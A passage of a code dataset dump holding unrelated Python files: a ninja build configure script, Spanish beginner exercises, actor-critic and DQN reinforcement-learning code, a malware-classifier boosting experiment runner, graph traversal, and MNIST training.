rust-lang/bitflags checkout')\n args.add_argument('--rust-extra-libdir', default=None,\n help='additional search directory for Rust libraries')\n args.add_argument('--rust-lib-externs', default='',\n help='list of --extern flags for locating Rust libraries')\n args.add_argument('--emscripten-fastcomp-prefix', default=None,\n help='path to kripken/emscripten-fastcomp build/install directory')\n\n args.add_argument('--rustc',\n help='name of the Rust compiler binary')\n args.add_argument('--cc',\n help='name of the C compiler binary')\n args.add_argument('--cxx',\n help='name of the C++ compiler binary')\n args.add_argument('--python3',\n help='name of the Python 3 interpreter binary')\n args.add_argument('--python3-config',\n help='name of the Python 3 build configuration helper binary')\n args.add_argument('--closure-compiler',\n help='name of the Closure Compiler binary')\n args.add_argument('--yui-compressor',\n help='name of the YUI Compressor binary')\n\n args.add_argument('--force', action='store_true', default=False,\n help='proceed even if there are configuration errors')\n\n args.add_argument('--cflags',\n help='extra flags for the C compiler')\n args.add_argument('--cxxflags',\n help='extra flags for the C++ compiler')\n args.add_argument('--ldflags',\n help='extra flags for the C/C++ linker')\n\n args.add_argument('--with-server-gui', action='store_true',\n help='include server_gui.py in the 
build')\n\n return args\n\n\nclass Info(object):\n def __init__(self, args):\n self._args = args\n\n script_dir = os.path.dirname(sys.argv[0])\n if script_dir == '':\n self.root_dir = '.'\n else:\n self.root_dir = os.path.normpath(os.path.join(script_dir, '..', '..'))\n\n in_tree = self.root_dir == '.' or self.root_dir == os.getcwd()\n\n if args.build_dir is None:\n self.build_dir = 'build' if in_tree else '.'\n else:\n self.build_dir = args.build_dir\n\n if args.dist_dir is None:\n self.dist_dir = 'dist' if in_tree else os.path.join(self.build_dir, 'dist')\n else:\n self.dist_dir = args.dist_dir\n\n def __getattr__(self, k):\n return getattr(self._args, k)\n\n\ndef header(i):\n def b(*args):\n return os.path.normpath(os.path.join(i.build_dir, *args))\n\n return template('''\n # Root of the source tree. This used to be called $src, but that would\n # be confusing now that $root/src is an actual directory.\n root = %{os.path.normpath(i.root_dir)}\n # Note: (1) `build` is a ninja keyword; (2) `builddir` is a special\n # variable that determines where `.ninja_log` is stored.\n builddir = %{os.path.normpath(i.build_dir)}\n dist = %{os.path.normpath(i.dist_dir)}\n prebuilt = %{os.path.normpath(i.prebuilt_dir or '')}\n\n _exe = %{'' if not i.win32 else '.exe'}\n _so = %{'.so' if not i.win32 else '.dll'}\n _a = .a\n\n b_native = %{b('native')}\n b_asmjs = %{b('asmjs')}\n b_data = %{b('data')}\n b_js = %{b('js')}\n b_scripts = %{b('scripts')}\n\n mods = %{','.join(i.mod_list)}\n\n rustc = %{i.rustc}\n cc = %{i.cc}\n cxx = %{i.cxx}\n python3 = %{i.python3}\n closure_compiler = %{i.closure_compiler}\n yui_compressor = %{i.yui_compressor}\n\n user_cflags = %{i.cflags}\n user_cxxflags = %{i.cxxflags}\n user_ldflags = %{i.ldflags}\n ''', os=os, **locals())\n\n\ndef fix_bitflags(src_out, src_in):\n return template('''\n rule fix_bitflags_src\n command = $\n echo '#![feature(no_std)]' >$out && $\n echo '#![no_std]' >>$out && $\n cat $in >> $out\n description = PATCH bitflags.rs\n\n build %src_out: fix_bitflags_src %src_in\n ''', **locals())\n\n\nif __name__ == '__main__':\n parser = build_parser()\n args = parser.parse_args(sys.argv[1:])\n\n log = open('config.log', 'w')\n log.write('Arguments: %r\\n\\n' % (sys.argv[1:],))\n\n i, ok = checks.run(args, log)\n if not ok:\n if i.force:\n print('Ignoring errors due to --force')\n else:\n sys.exit(1)\n\n if i.python3_config is not None:\n py_includes = subprocess.check_output((i.python3_config, '--includes')).decode().strip()\n py_ldflags = subprocess.check_output((i.python3_config, '--ldflags')).decode().strip()\n else:\n py_includes = None\n py_ldflags = None\n\n if i.debug:\n dist_manifest_base = 'debug.manifest'\n else:\n dist_manifest_base = 'release.manifest'\n\n dist_manifest = os.path.join(i.root_dir, 'mk', dist_manifest_base)\n common_manifest = os.path.join(i.root_dir, 'mk', 'common.manifest')\n maybe_data_filter = os.path.join(i.root_dir, 'mk', 'data_files.txt') \\\n if i.data_only else None\n\n dist_extra = []\n if i.with_server_gui:\n dist_extra.append(('server_gui.py', '$root/util/server_gui.py'))\n\n content = header(i)\n content += '\\n\\n'.join((\n '',\n dist.rules(i),\n ))\n\n if not i.data_only:\n content += '\\n\\n'.join((\n '',\n '# Native',\n native.rules(i),\n native.rust('syntax_exts', 'dylib', (), extra_flags='-C prefer-dynamic'),\n native.rust('physics', 'lib', ()),\n native.rust('server_types', 'lib', ('physics',)),\n native.rust('server_config', 'lib', ('server_types',)),\n native.rust('server_extra', 'lib', ('server_types',)),\n 
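The configure script assembles build.ninja by concatenating template snippets, one per rule or build edge. A toy version of that emission using plain str.format rather than the project's template() helper; the rule name and paths here are made up for illustration:

```python
def ninja_rule(name, command, description):
    """Emit a ninja rule block in the style the generator concatenates.
    Plain str.format here; the real script uses its own template()."""
    return ('rule {name}\n'
            '  command = {command}\n'
            '  description = {description}\n').format(
                name=name, command=command, description=description)

def ninja_build(output, rule, inputs):
    return 'build {0}: {1} {2}\n'.format(output, rule, ' '.join(inputs))

content = ninja_rule('rustc_lib', 'rustc $in -o $out', 'RUSTC $out')
content += ninja_build('$builddir/libphysics.rlib', 'rustc_lib',
                       ['$root/src/physics/lib.rs'])
print(content)
```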
native.rust('server_util', 'lib', ('server_types',)),\n native.rust('server_world_types', 'lib', ('server_types',)),\n native.rust('server_bundle', 'lib',\n ('physics', 'server_config', 'server_extra', 'server_types',\n 'server_util', 'server_world_types')),\n native.rust('server_bundle', 'staticlib',\n ('physics', 'server_config', 'server_extra', 'server_types',\n 'server_util', 'server_world_types'),\n extra_flags='--cfg ffi'),\n native.rust('terrain_gen_algo', 'lib', ('server_types',), build_type='release'),\n native.rust('terrain_gen', 'lib',\n ('physics', 'server_config', 'server_types', 'server_util', 'terrain_gen_algo'),\n # Slow terrain gen algorithms cause serious problems in debug\n # builds (3000+ ms to generate each chunk).\n build_type='release'),\n native.rust('backend', 'bin',\n ('physics', 'terrain_gen',\n 'server_bundle', 'server_config', 'server_extra',\n 'server_types', 'server_util', 'server_world_types',),\n dyn_deps=('syntax_exts',),\n src_file='$root/src/server/main.rs'),\n native.cxx('wrapper', 'bin',\n ('$root/src/wrapper/%s' % f\n for f in os.listdir(os.path.join(i.root_dir, 'src', 'wrapper'))\n if f.endswith('.cpp')),\n cxxflags='-DWEBSOCKETPP_STRICT_MASKING',\n ldflags='-static',\n # TODO: detect these lib flags\n libs='-lboost_system -lpthread' if not i.win32 else\n '-lboost_system-mt -lpthread -lwsock32 -lws2_32'),\n native.cxx('outpost_savegame', 'shlib',\n ('$root/util/savegame_py/%s' % f\n for f in os.listdir(os.path.join(i.root_dir, 'util/savegame_py'))\n if f.endswith('.c')),\n cflags=py_includes,\n ldflags=py_ldflags,\n ),\n\n native.rust('terrain_gen_ffi', 'staticlib',\n ('terrain_gen', 'server_config', 'server_types'),\n src_file='$root/src/test_terrain_gen/ffi.rs'),\n native.cxx('outpost_terrain_gen', 'shlib',\n ('$root/src/test_terrain_gen/py.c',),\n cflags=py_includes,\n ldflags=py_ldflags,\n link_extra=['$b_native/libterrain_gen_ffi$_a'],\n ),\n\n 'build pymodules: phony '\n '$b_native/outpost_savegame$_so '\n '$b_native/outpost_terrain_gen$_so',\n\n native.rust('equip_sprites_render', 'dylib',\n ('physics',),\n src_file='$root/src/gen/equip_sprites/render.rs'),\n dist.copy('$b_native/libequip_sprites_render$_so',\n '$b_native/equip_sprites_render$_so'),\n\n '# Asm.js',\n asmjs.rules(i),\n asmjs.rlib('core', (), i.rust_libcore_src),\n asmjs.rlib('alloc', ('core',), i.rust_liballoc_src),\n asmjs.rlib('rustc_unicode', ('core',), i.rust_librustc_unicode_src),\n asmjs.rlib('collections', ('core', 'alloc', 'rustc_unicode'),\n i.rust_libcollections_src),\n asmjs.rlib('asmrt', ('core',)),\n asmjs.rlib('asmmalloc', ('core', 'asmrt')),\n asmjs.rlib('fakestd', ('core', 'alloc', 'rustc_unicode', 'collections',\n 'asmrt', 'asmmalloc')),\n asmjs.rlib('bitflags', ('core',), i.rust_libbitflags_src),\n asmjs.rlib('physics', ('fakestd', 'bitflags')),\n asmjs.rlib('client_ui_atlas', ('core', 'physics',), '$b_data/ui_atlas.rs'),\n asmjs.rlib('client_fonts', ('core',), '$b_data/fonts_metrics.rs'),\n asmjs.rlib('client', ('fakestd', 'physics',\n 'client_ui_atlas', 'client_fonts')),\n asmjs.asmlibs('asmlibs',\n '$root/src/asmlibs/lib.rs',\n ('core', 'collections', 'asmrt', 'asmmalloc', 'physics', 'client'),\n '$root/src/asmlibs/exports.txt',\n '$root/src/asmlibs/template.js'),\n\n '# Javascript',\n js.rules(i),\n js.compile(i, '$b_js/outpost.js', '$root/src/client/js/main.js'),\n js.minify(i, '$b_js/asmlibs.js', '$b_asmjs/asmlibs.js'),\n js.compile(i, '$b_js/configedit.js', '$root/src/client/js/configedit.js'),\n\n '# uvedit',\n asmjs.asmlibs('uvedit_asm',\n 
'$root/src/uvedit/lib.rs',\n ('core', 'collections', 'asmrt', 'asmmalloc', 'physics'),\n '$root/src/uvedit/asm_exports.txt',\n '$root/src/uvedit/asm_template.js'),\n js.minify(i, '$b_js/uvedit_asm.js', '$b_asmjs/uvedit_asm.js'),\n js.compile(i, '$b_js/uvedit.js', '$root/src/uvedit/main.js'),\n ))\n\n content += '\\n\\n'.join((\n '',\n '# Data',\n data.rules(i),\n data.font('name', '$root/assets/misc/NeoSans.png'),\n data.font('title', '$root/assets/misc/Alagard.png',\n extra_args='--no-shadow --color=0xdeeed6'),\n data.font('hotbar', '$root/assets/misc/hotbar-font.png',\n charset_args='--char-list=\"0123456789.k\"'),\n data.font_stack('$b_data/fonts', ('name', 'hotbar', 'title')),\n data.day_night('$b_data/day_night.json', '$root/assets/misc/day_night_pixels.png'),\n data.server_json('$b_data/server.json'),\n data.ui_atlas('$b_data', '$root/assets/ui_gl/png'),\n data.process(),\n data.binary_defs('$b_data/client_data.bin'),\n data.pack(),\n data.credits('$b_data/credits.html'),\n\n '# Server-side scripts',\n scripts.rules(i),\n scripts.copy_mod_scripts(i.mod_list),\n\n '# Distribution',\n # dist rules go at the top so other parts can refer to `dist.copy`\n dist.from_manifest(common_manifest, dist_manifest,\n filter_path=maybe_data_filter,\n exclude_names=i.use_prebuilt,\n extra=dist_extra),\n\n 'default $builddir/dist.stamp',\n '', # ensure there's a newline after the last command\n ))\n\n with open('build.ninja', 'w') as f:\n f.write(content)\n\n print('Generated build.ninja')\n print('Run `ninja` to build')\n","sub_path":"mk/configure/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":13661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397453885","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpide\n\nThis is a temporary script file.\n\"\"\"\nx=6\ny=9\n\nwhile x>0 and y>0:\n x=x-1\n y=y-1\n\n\nprint(x)\nprint(y)\n","sub_path":"alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177253779","text":"list_1_100 = [ num for num in range(0,101) ]\n\n\"\"\"\nmeses = ('Enero','Febrero','Marzo','Abril','Mayo','Junio','Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre')\n\nnumber = int(input(\"Ingrese un número\"))\nif 1 <= number <= len(meses)-1:\n print(meses[number])\nelse:\n raise Exception(\"nuevo error\")\n\"\"\"\n\"\"\"\nnumero_por_teclado = int(input(\"ingrese un número\"))\n\ntabla_de_multiplicar = [ numero_por_teclado*number for number in range(1,11) ]\nprint(tabla_de_multiplicar)\n\n\"\"\"\n\"\"\"\nlist_numbers = []\nwhile True:\n try:\n numero = int(input(\"Ingrese un número : \"))\n if numero == 0:\n break\n list_numbers.append(numero)\n except Exception:\n print(\"Ingrese solo números \")\nlist_numbers.sort()\nlist_numbers.sort(reverse=True)\nprint(list_numbers)\n\ncadena = input(\"Escribe una cadena : \")\nprint(cadena.split(\" \"))\n\"\"\"\ntupla_numeros = ( 1,2,3,4,1,1,2,2,3,44,5,56 )\n\nfrom functools import reduce\ndef cant_repeat(numberSearch,tuple_):\n count = 0\n for numberTuple in tuple_:\n if numberTuple == numberSearch: count+=1\n return count\n\ndef max_min(tupla):\n return { \"minimo\":min(tupla), \"maximo\":max(tupla) }\n\nprint(max_min((1,2,3,4,5,6,7,8,9,10)))\n\n\"\"\"\ndef pedir_contactos():\n contactos = {}\n while True:\n nombre = input(\"ingrese su nombre\")\n if nombre in contactos:\n print(\"el nombre ya se encuentra registrado\")\n else:\n 
numero_telefono = int(input(\"ingrese su telefono\"))\n contactos[nombre] = numero_telefono\n opcion = input(\" Desea escribir más contactos ? SI/NO si/no\")\n if opcion == \"NO\" or opcion == \"no\":\n break\n\"\"\"\n\ncreate_tuple = tuple([ x for x in range(1,11)])\nprint(create_tuple)\n\nlista_vacia = [ \" \" for x in range(0,10)]\n\nfor n in range(0,10):\n message = \"Ingrese el valor para la posición {0} : \".format(n)\n lista_vacia[n] = input(message)\n\n\n\n\n\n\n\n\n","sub_path":"cursos/ejercicios/discoduroroer/listas_tuplas_diccionarios.py","file_name":"listas_tuplas_diccionarios.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"624716025","text":"import torch\nimport torch.autograd as autograd\nimport torch.distributions as distributions\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\n\nfrom models import *\nfrom prototype import *\n\n\n# device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# script_path = os.path.dirname(os.path.realpath(__file__))\n# model_path = os.path.join(script_path, 'model.pt')\n#\n# # Hyperparameters --- don't change, RL is very sensitive\n# learning_rate = 0.001\n# gamma = 0.98\n# buffer_limit = 5000\n# batch_size = 32\n# max_episodes = 2000\n# t_max = 600\n# min_buffer = 1000\n# target_update = 20 # episode(s)\n# train_steps = 10\n# max_epsilon = 1.0\n# min_epsilon = 0.01\n# epsilon_decay = 500\n# print_interval= 20\n#\n# Transition = collections.namedtuple('Transition', ('state', 'action', 'reward', 'next_state', 'done'))\nENT_COEF = 1e-2\n\n\nclass ActorCritic():\n # def __init__(self, env, network_model, existed_model):\n # self.log_probs = None\n #\n # self.actor = existed_model\n # self.critic_net = network_model(env.observation_space.shape, 1).to(device)\n # self.critic_target = network_model(env.observation_space.shape, 1).to(device)\n # self.action_critic = existed_model\n #\n # self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n # self.critic_optimizer = optim.Adam(self.critic_net.parameters(), lr=learning_rate)\n # self.action_critic_optimizer = optim.Adam(self.action_critic.parameters(), lr=learning_rate)\n def __init__(self, actor, critic_net, action_critic, network_model):\n self.log_probs = None\n\n self.actor = actor\n\n self.critic_net = critic_net\n self.critic_target = network_model(critic_net.input_shape, 1).to(device)\n self.critic_target.load_state_dict(self.critic_net.state_dict())\n self.critic_target.eval()\n\n self.action_critic = action_critic\n\n self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=learning_rate)\n self.critic_optimizer = optim.Adam(self.critic_net.parameters(), lr=learning_rate)\n self.action_critic_optimizer = optim.Adam(self.action_critic.parameters(), lr=learning_rate)\n\n def choose_action(self, state):\n if not isinstance(state, torch.FloatTensor):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n\n probabilities = F.softmax(self.actor.forward(state), dim=1)\n action_probs = distributions.Categorical(probabilities)\n action = action_probs.sample()\n self.log_probs = action_probs.log_prob(action)\n return action.item()\n # if not isinstance(state, torch.FloatTensor):\n # state = torch.from_numpy(state).float().unsqueeze(0).to(self.device)\n # '''\n # FILL ME : This function should return epsilon-greedy action.\n #\n # Input:\n # * `state` (`torch.tensor` [batch_size, 
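A minimal, self-contained sketch of the two tuple helpers defined in the record above (cant_repeat and max_min), exercised on a made-up tuple:

def cant_repeat(value, tup):
    # count occurrences of value; equivalent to tup.count(value)
    return sum(1 for x in tup if x == value)

def max_min(tup):
    return {"minimo": min(tup), "maximo": max(tup)}

nums = (1, 2, 2, 3, 3, 3)
assert cant_repeat(3, nums) == nums.count(3) == 3
assert max_min(nums) == {"minimo": 1, "maximo": 3}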
channel, height, width])\n # * `epsilon` (`float`): the probability for epsilon-greedy\n #\n # Output: action (`Action` or `int`): representing the action to be taken.\n # if action is of type `int`, it should be less than `self.num_actions`\n # '''\n # #Get a random number and determine if agent should exploit or explore\n # rand_num = np.random.random()\n # if(rand_num < epsilon):#explore by choosing random action\n # output_action = np.random.randint(self.model.num_actions)\n # else: #exploit by choosing best action\n # output_actions = self.model.forward(state)\n # output_action = torch.argmax(output_actions).item()\n # return output_action\n\n\n def learn(self, memory):\n if len(memory) >= batch_size:\n print(\"learn ---\")\n states, actions, rewards, next_states, dones = memory.sample(batch_size, device)\n \n \n # forward calc\n action_log_prob = self.actor(states)\n action_prob = F.softmax(action_log_prob, dim=1)\n action_log_prob = F.log_softmax(action_log_prob, dim=1)\n \n cur_value = self.critic_net(states).squeeze(1)\n next_value = self.critic_target(next_states)\n action_value = self.action_critic(states)\n \n # critic loss. eq (5) in SAC paper\n value_target = (action_value - ENT_COEF * action_log_prob).gather(1, actions).squeeze(1)\n critic_loss = 0.5 * F.smooth_l1_loss(cur_value, value_target.detach())\n \n # action critic loss. eq (7), (8) in SAC paper\n action_value_target = (rewards + gamma * (1 - dones) * next_value).squeeze(1)\n action_critic_loss = 0.5 * F.smooth_l1_loss(action_value.gather(1, actions).squeeze(1), action_value_target.detach())\n \n # actor loss. eq (10) in SAC paper\n actor_loss = torch.mean(action_prob*(action_log_prob- F.log_softmax(action_value.detach()/ENT_COEF, dim=1)))\n \n \n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n \n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n \n self.action_critic_optimizer.zero_grad()\n action_critic_loss.backward()\n self.action_critic_optimizer.step()\n \n self.critic_target.load_state_dict(self.critic_net.state_dict())\n \n #\n # critic_value = self.critic.forward(state)\n # critic_value_next = self.critic.forward(new_state)\n # td_error = ((reward + gamma * critic_value_next * (1- int(done))) - critic_value)\n #\n # actor_loss = -self.log_probs * td_error\n # critic_loss = td_error**2\n #\n # #print(actor_loss, critic_loss)\n # (actor_loss + critic_loss).backward()\n #\n # self.actor_optimizer.step()\n # self.critic_optimizer.step()\n return actor_loss, critic_loss, action_critic_loss\n\n def save_models(self):\n\n script_path = os.path.dirname(os.path.realpath(__file__))\n actor_model_path = os.path.join(script_path, 'actor_model.pt')\n actor_data = (self.actor.__class__.__name__, self.actor.state_dict(), self.actor.input_shape, self.actor.num_actions)\n torch.save(actor_data, actor_model_path)\n\n critic_model_path = os.path.join(script_path, 'critic_model.pt')\n critic_data = (self.critic_net.__class__.__name__, self.critic_net.state_dict(), self.critic_net.input_shape, self.critic_net.num_actions)\n torch.save(critic_data, critic_model_path)\n\n action_critic_model_path = os.path.join(script_path, 'action_critic_model.pt')\n action_critic_data = (self.action_critic.__class__.__name__, self.action_critic.state_dict(), self.action_critic.input_shape, self.action_critic.num_actions)\n torch.save(action_critic_data, 
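A minimal sketch of the categorical action sampling used in choose_action above; the logits are made up, not taken from any trained network.

import torch
import torch.nn.functional as F
import torch.distributions as distributions

logits = torch.tensor([[1.0, 2.0, 0.5]])       # hypothetical actor output
probs = F.softmax(logits, dim=1)
dist = distributions.Categorical(probs)
action = dist.sample()                          # stochastic action
print(action.item(), dist.log_prob(action).item())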
action_critic_model_path)\n\n","sub_path":"HW3_task2-ac-v2-p/agent/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"436680271","text":"import os,sys,gc,itertools,tqdm\n\nsys.path.append(os.path.dirname(os.getcwd()))\nfrom boostember import *\n\nconfig = {\n 'booster': ['lgb'],\n 'experiment': ['emberboosting'],\n 'n_estimator': [10, 50, 100, 500, 1000],\n 'defaultdataset': [True],\n}\n\n#farr=['MEAN(coff_characteristics.coff_characteristics_hash_13)', 'MAX(datadirectories.size_CERTIFICATE_TABLE)', 'MEAN(imports_api.imports.imports_hash_20)', 'MAX(header_optional.optional_major_subsystem_version)', 'MIN(section_sections.MEAN(sections_props.props_hash_14))', 'MEAN(imports_api.imports_api_hash_10)', 'MAX(datadirectories.size_RESOURCE_TABLE)', 'STD(imports.imports_hash_16)', 'MODE(header_optional.optional_subsystem) = WINDOWS_GUI']\nfarr=['header_coff_characteristics_3', 'imports_libraries_hashed_117', 'header_optional_major_subsystem_version', 'strings_printabledist_74', 'header_optional_subsystem_8', 'datadirectories_RESOURCE_TABLE_size', 'datadirectories_CERTIFICATE_TABLE_size', 'datadirectories_DEBUG_virtual_address', 'header_coff_characteristics_0']\nfstr = ' and featureselect' if farr is not None else ''\n\ndef run():\n\n keys, values = zip(*config.items())\n experiments = tqdm.tqdm([dict(zip(keys, v)) for v in itertools.product(*values)])\n\n for experimentdict in experiments:\n exp = f'no AFE without featurehaser{fstr}' if experimentdict['defaultdataset'] else f'AFE without featurehaser{fstr}'\n experiments.set_description(\"{} \\n\".format(\"\\t\".join(f\"[{k}]: {v}\" for k, v in experimentdict.items())))\n run = Boosting(f'{experimentdict[\"booster\"]} n{experimentdict[\"n_estimator\"]} {exp}',\n experiment=experimentdict['experiment'], booster=experimentdict[\"booster\"],\n n_estimator=experimentdict[\"n_estimator\"], defaultdataset=experimentdict[\"defaultdataset\"],\n features=farr,\n dataset='/home/aizat/OneDrive/Master Project/Workspace/dataset/ember2018', n_jobs=21, verbose=False)\n run.main(cv=True, n=5)\n del run\n gc.collect()\n\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"scripts/lightgbm_ember.py","file_name":"lightgbm_ember.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38573873","text":"from collections import deque\n\nN, M, V = map(int, input().split())\ngraph = [[0]*(N+1) for _ in range(N+1)]\n\n\ndef dfs(v):\n print(v, end=' ')\n visited[v] = 1\n\n for w in graph[v]:\n if graph[v][w] and not visited[w]:\n dfs(w)\n\n\ndef bfs(v):\n Q = deque([v])\n visited[v] = 1\n while Q:\n q = Q.popleft()\n print(q, end=' ')\n for w in graph[q]:\n if graph[q][w] and not visited[w]:\n Q.append(w)\n visited[w] = 1\n\n\nfor _ in range(M):\n v, w = map(int, input().split())\n graph[v][w] = w\n graph[w][v] = v\n\n\nvisited = [0]*(N+1)\ndfs(V)\nprint()\nvisited = [0]*(N+1)\nbfs(V)\n\n","sub_path":"AHYEON/02.DFSBFS/1260_dfs와bfs.py","file_name":"1260_dfs와bfs.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"487527919","text":"from torch.autograd import Variable\nimport torch.nn as nn\n\n\nclass DefinitionClassifier(nn.Module):\n\n def __init__(self, feature_size, hidden_size, target_size,\n dropout=0.5):\n\n \"\"\"\n A two-layer neural 
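A minimal sketch of the soft value target computed in learn above (the discrete-action form of eq. 5 in the SAC paper): V(s) <- Q(s, a) - alpha * log pi(a|s). Batch size, action count, and all tensor values here are made up.

import torch
import torch.nn.functional as F

alpha = 1e-2                        # entropy coefficient (ENT_COEF above)
q = torch.randn(4, 3)               # Q-values: batch of 4 states, 3 actions
log_pi = F.log_softmax(torch.randn(4, 3), dim=1)  # actor log-probs
actions = torch.randint(0, 3, (4, 1))
# gather selects the entry for the action actually taken in each row:
value_target = (q - alpha * log_pi).gather(1, actions).squeeze(1)
print(value_target.shape)           # torch.Size([4])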
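For contrast with the adjacency-matrix scan in the 1260 BFS/DFS solution above, a minimal adjacency-list BFS sketch over a made-up directed graph:

from collections import deque

adj = {1: [2, 3], 2: [4], 3: [], 4: []}   # hypothetical edges
visited, order, queue = {1}, [], deque([1])
while queue:
    v = queue.popleft()
    order.append(v)
    for w in adj[v]:
        if w not in visited:
            visited.add(w)
            queue.append(w)
print(order)   # [1, 2, 3, 4]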
network that accepts hidden states to predict the\n omitted target term from a passage missing the target term.\n\n The purpose of this model is to determine if the latent representations\n of the language model are rich enough to indicative of the words they\n are encoding.\n\n We allow the model to be minimal to test the richness of the features.\n\n Parameters:\n -----------\n :param feature_size: int\n The number of features we've selected from the model.\n :param target_size: int\n The size of the vocabulary in which to predict.\n :param hidden_size: int\n The number of hidden dimensions to map the input to before\n the output layer.\n \"\"\"\n # Save the construction arguments, useful for serialization\n self.init_arguments = locals()\n self.init_arguments.pop(\"self\")\n self.init_arguments.pop(\"__class__\")\n super(DefinitionClassifier, self).__init__()\n\n self.target_size = target_size\n self.hidden_size = hidden_size\n self.dropout = dropout\n\n self.model = nn.Sequential(\n nn.Linear(feature_size, hidden_size),\n nn.ReLU(),\n nn.Dropout(self.dropout),\n nn.Linear(hidden_size, target_size)\n )\n\n def forward(self, input):\n\n # Forward pass.\n # Shape: (1, target_size)\n return self.model(input)\n","sub_path":"metrics/feature_extraction/definition_classifier.py","file_name":"definition_classifier.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"613867727","text":"'''\nFile Name: main \nAuthor: Shiming Luo\nDate: 2018.05.06\n'''\n\nimport numpy as np\nimport loader\nfrom preprocessing import *\nfrom architecture import *\n\nif __name__ == '__main__':\n \n ### load data\n mnist = loader.MNIST('/MNIST/raw/')\n train_images, train_labels = mnist.load_training()\n test_images, test_labels = mnist.load_testing()\n\n\n train_images,train_labels = preprocess(train_images,train_labels,60000)\n\n #### set up train, validation, test sets\n x_train = np.matrix(train_images[:50000]) ## N1*785\n x_val = np.matrix(train_images[50000:]) ## N2*785\n t_train = np.matrix(train_labels[:50000]).T ## N1*1\n t_val = np.matrix(train_labels[50000:]).T ## N2*1\n\n #### pre-processing\n x_train = z_score(x_train) ## N1*785\n x_val = z_score(x_val) ## N2*785\n\n t_train_original = t_train\n t_val_original = t_val\n\n t_train = one_hot(t_train) ## N1*10\n t_val = one_hot(t_val) ## N2*10\n\n ### constrct a one hidden layer model\n OneHM = OneHiddenModel()\n\n ### convert train set and validation set to array\n x_train = np.array(x_train)\n t_train = np.array(t_train)\n x_val = np.array(x_val)\n t_val = np.array(t_val)\n\n ### train 30 epoches\n epoches = 30\n for epoch in range(epoches):\n for m in range(len(x_train)//OneHM.batch_size):\n X = x_train[m*OneHM.batch_size : (m+1)*OneHM.batch_size]\n t = t_train[m*OneHM.batch_size : (m+1)*OneHM.batch_size]\n OneHM.train(X, t)\n if (epoch+1)%3 == 0:\n print('epoch: {}/{}'.format(epoch+1,epoches))\n error,acc = OneHM.evaluation(x_train,t_train)\n print('train error: {:.4f}, train accuracy: {:.2f}%'.format(error,100*acc))\n error,acc = OneHM.evaluation(x_val,t_val)\n print('valid error: {:.4f}, valid accuracy: {:.2f}%'.format(error,100*acc))\n\n\n","sub_path":".ipynb_checkpoints/main-checkpoint.py","file_name":"main-checkpoint.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271918686","text":"# So that float division is by default in python 2.7\nfrom __future__ 
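A self-contained sketch of the same two-layer probe shape as DefinitionClassifier above, with made-up feature, hidden, and vocabulary sizes:

import torch
import torch.nn as nn

probe = nn.Sequential(
    nn.Linear(128, 64),   # feature_size -> hidden_size
    nn.ReLU(),
    nn.Dropout(0.5),
    nn.Linear(64, 1000),  # hidden_size -> target_size (vocabulary)
)
logits = probe(torch.randn(1, 128))
print(logits.shape)       # torch.Size([1, 1000])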
import division\n\nimport pandas as pd\n\ndf = pd.read_csv('data/house_pricing.csv')\n\n\n# Enter Code Here\ndef cond_prob(df):\n df1 = df[df['Neighborhood']=='OldTown']['Neighborhood'].count()\n df2 = df.shape[0]\n conditional_prob = (df1/df2)*((df1-1)/(df2-1))*((df1-2)/(df2-2))\n\n return conditional_prob\n","sub_path":"q01_cond_prob/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"19750285","text":"import time\nimport gym\nfrom tensorboardX import SummaryWriter\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch\nimport numpy as np\nfrom rl.utils.rl_utils import test_model\nfrom rl.utils.exp_buffer import ExperienceBuffer, Experience\n\n\nclass DQN(nn.Module):\n def __init__(self, state_size_, action_size_, hidden_size_):\n super().__init__()\n self.state_size = state_size_\n self.action_size = action_size_\n self.hidden_size = hidden_size_\n\n self.fc1 = nn.Linear(self.state_size, self.hidden_size)\n self.fc2 = nn.Linear(self.hidden_size, self.hidden_size)\n self.fc3 = nn.Linear(self.hidden_size, self.action_size)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n return self.fc3(x)\n\n\nclass Agent:\n def __init__(self, env, exp_buffer):\n self.env = env\n self.exp_buffer: ExperienceBuffer = exp_buffer\n self.state = None\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self._reset()\n\n def _reset(self):\n self.state = env.reset()\n self.total_reward = 0.0\n\n def play_step(self, net, epsilon=0.0):\n done_reward = None\n\n if np.random.random() < epsilon:\n action = env.action_space.sample()\n else:\n state_a = np.array([self.state], copy=False)\n model.eval()\n with torch.no_grad():\n state_v = torch.FloatTensor(state_a).to(self.device)\n q_vals_v = net(state_v)\n _, act_v = 